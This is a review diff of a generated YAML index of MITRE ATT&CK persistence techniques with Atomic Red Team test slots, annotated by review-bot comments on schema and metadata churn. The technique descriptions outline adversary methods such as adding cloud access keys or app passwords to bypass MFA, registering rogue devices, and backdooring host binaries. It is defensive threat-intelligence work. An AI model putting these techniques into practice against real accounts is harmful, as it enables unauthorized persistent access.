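Review bot: the large removed block here (`x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the whole `external_references` list for T1137.001) reappears lower in the same entry in a later hunk, so this is a move, not a deletion. The only substantive changes in this hunk are the `spec_version`/`x_mitre_attack_spec_version` removal from T1542.002 and the T1137.001 `modified` update to `2024-10-15T16:01:35.918Z`; the reviewer should read the two hunks together rather than treating this one as dropping the references.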
@@ -31629,6 +31991,7 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: 'Many Office-related persistence mechanisms require changes
to the Registry and for binaries, files, or scripts to be written to disk
or existing files modified to include malicious scripts. Collect events related
@@ -31638,9 +32001,13 @@ persistence:
also be investigated since the base templates should likely not contain VBA
macros. Changes to the Office macro security settings should also be investigated.(Citation:
GlobalDotName Jun 2019)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -31648,11 +32015,47 @@ persistence:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+ created: '2019-11-07T20:29:17.788Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/001
+ external_id: T1137.001
+ - source_name: MSDN VBA in Office
+ description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+ Retrieved July 3, 2017.
+ url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+ - source_name: Hexacorn Office Template Macros
+ description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+ Retrieved July 3, 2017.
+ url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+ - source_name: Microsoft Change Normal Template
+ description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+ Retrieved July 3, 2017.
+ url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+ - source_name: enigma0x3 normal.dotm
+ description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+ Retrieved July 3, 2017.
+ url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+ - source_name: CrowdStrike Outlook Forms
+ description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+ Movement and Persistence. Retrieved February 5, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.001
atomic_tests: []
T1546.009:
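Review bot: `x_mitre_permissions_required` (`User`, `Administrator`) is removed from T1137.001 and nothing replaces it, while other entries in this diff still carry `x_mitre_permissions_required` (T1547.015, T1205.001) or `x_mitre_effective_permissions` (T1546.009). Please confirm the upstream object really dropped the field rather than the generator losing it, since downstream tooling that filters tests by required privilege will stop seeing this technique. The re-added `external_references` list is complete relative to the removed one (all eight sources are present, with `mitre-attack` first), and the `Windows`/`Office Suite` platform pair plus the `'1.2'` version bump are consistent with the other platform retags in this diff.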
@@ -31684,7 +32087,7 @@ persistence:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -31732,13 +32135,11 @@ persistence:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -31751,16 +32152,16 @@ persistence:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -31772,16 +32173,16 @@ persistence:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
@@ -31836,7 +32237,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542:
technique:
@@ -31897,7 +32297,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.015:
technique:
@@ -31973,7 +32372,7 @@ persistence:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -32001,8 +32400,6 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1205.001:
@@ -32028,7 +32425,7 @@ persistence:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -32053,23 +32450,21 @@ persistence:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
@@ -32079,11 +32474,15 @@ persistence:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
@@ -32094,12 +32493,19 @@ persistence:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
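Review bot: the `x_mitre_attack_spec_version: 3.2.0` line added after `phase_name: privilege-escalation` is the same key that a later hunk removes from after `object_marking_refs`, so this is key reordering rather than a content change; if the generator does not emit keys in a stable order, every regeneration will produce this kind of churn and bury the real edits (here, the new app-password paragraph). Consider sorting keys deterministically in the generator so the diff shows only the text and reference changes.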
@@ -32108,6 +32514,7 @@ persistence:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
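Review bot: with the description and platform list moving from "Azure AD" to "Entra ID" / "Identity Provider" elsewhere in this patch, the unchanged `x_mitre_detection` context line still says "Monitor Azure Activity Logs for Service Principal and Application modifications"; that wording is inherited from upstream, but it is now the only Azure-specific guidance left on a technique whose platform is the generic "Identity Provider", so it is worth checking whether the upstream bundle has a matching detection update that the generator is not carrying over.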
@@ -32116,13 +32523,16 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
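Review bot: removing the `- Azure AD` platform and adding `- Identity Provider` (with the version bump to `'2.8'`) means anything in this repository that filters or indexes techniques by the literal platform string "Azure AD" will silently drop this technique; the corresponding index files should be regenerated in the same change so the platform rename and the index contents do not drift apart.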
@@ -32148,10 +32558,18 @@ persistence:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
@@ -32160,10 +32578,20 @@ persistence:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -32180,9 +32608,6 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests:
- name: AWS - Create Access Key and Secret Key
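Review bot: the removal of `spec_version: '2.1'` here (and the same removal repeated for every technique in this patch) is a schema change, not a reorder: `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are only moved, but `spec_version` disappears entirely. Confirm that no consumer of these index files reads the STIX `spec_version` field before dropping it across the board, and call the removal out in the commit message.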
@@ -32221,7 +32646,7 @@ persistence:
name: sh
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
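Review bot: the `modified` timestamp for T1556.008 moves backwards, from `'2023-10-31T14:00:00.188Z'` to `'2023-05-04T18:02:51.318Z'`; the same backwards move appears later in this patch for T1546.014 and T1574.010. The replaced values all share the `14:00:00.188Z` pattern of a bulk edit, so the new values may well be the correct upstream ones, but a regression in `modified` is exactly what a stale source bundle would produce, so verify which upstream release the generator consumed.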
@@ -32296,7 +32721,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -32385,24 +32809,27 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1554:
technique:
- modified: '2024-04-16T13:03:40.824Z'
+ modified: '2024-10-12T16:52:46.067Z'
name: Compromise Host Software Binary
description: |-
Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
- Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+ Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+ After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- CrowdStrike Falcon OverWatch
+ - Liran Ravich, CardinalOps
+ - Jamie Williams (U ω U), PANW Unit 42
x_mitre_deprecated: false
x_mitre_detection: "Collect and analyze signing certificate metadata and check
signature validity on software that executes within the environment. Look
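Review bot: the rewritten description line still carries "establish persistence though modifications" (should be "through"), copied verbatim from the removed line. Since this file is generated from the upstream ATT&CK text, the fix belongs upstream rather than in a hand edit here; otherwise the next regeneration reintroduces it. The new sentence on `yum-versionlock` / `versionlock.list` is a useful defensive detail and is already covered by the existing `File: File Modification` data source.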
@@ -32416,7 +32843,7 @@ persistence:
- Linux
- macOS
- Windows
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Deletion'
- 'File: File Modification'
@@ -32431,6 +32858,11 @@ persistence:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1554
external_id: T1554
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Unit42 Banking Trojans Hooking 2022
description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
Financially Motivated Malware Became Infrastructure. Retrieved September
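Review bot: the new reference description is a double-quoted scalar beginning with a leading space (`" Punsaen Boonyakarn, Shawn Chew, ...`), which YAML preserves, so the rendered citation will start with a space. It is an upstream artifact, but the generator could strip leading and trailing whitespace on `description` values so it does not propagate into every index.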
@@ -32444,11 +32876,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -32474,7 +32905,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -32488,7 +32918,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -32515,8 +32944,8 @@ persistence:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -32527,7 +32956,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1546.014:
@@ -32568,7 +32998,7 @@ persistence:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -32588,12 +33018,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -32647,11 +33076,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -32738,9 +33166,9 @@ persistence:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -32753,12 +33181,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1136.003:
technique:
- modified: '2024-03-28T16:14:28.678Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Create Account: Cloud Account'
description: |-
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -32771,9 +33198,11 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
- Microsoft Threat Intelligence Center (MSTIC)
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Collect usage logs from cloud user and administrator accounts
to identify unusual activity in the creation of new accounts and assignment
@@ -32782,13 +33211,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Creation'
type: attack-pattern
@@ -32836,9 +33265,6 @@ persistence:
url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.003
atomic_tests:
- name: AWS - Create a new IAM user
@@ -32878,7 +33304,7 @@ persistence:
elevation_required: false
T1098:
technique:
